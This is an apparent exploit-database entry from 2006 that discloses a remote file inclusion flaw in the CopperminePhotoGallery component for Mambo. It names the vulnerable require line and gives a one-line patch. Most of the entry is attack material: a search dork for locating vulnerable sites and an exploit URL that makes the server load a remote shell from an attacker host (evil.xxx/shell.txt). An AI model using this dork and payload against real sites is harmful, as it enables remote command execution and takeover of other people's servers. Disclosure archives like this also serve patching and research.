id: 700
date: 08/15/2006
title: Mambo CopperminePhotoGalery Component Remote Include Vulnerability
author: k1tk4t
cves: 

==================================================================
Mambo CopperminePhotoGalery Component Remote Include Vulnerability
==================================================================



###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?





#  0day.today [2023-03-24]  #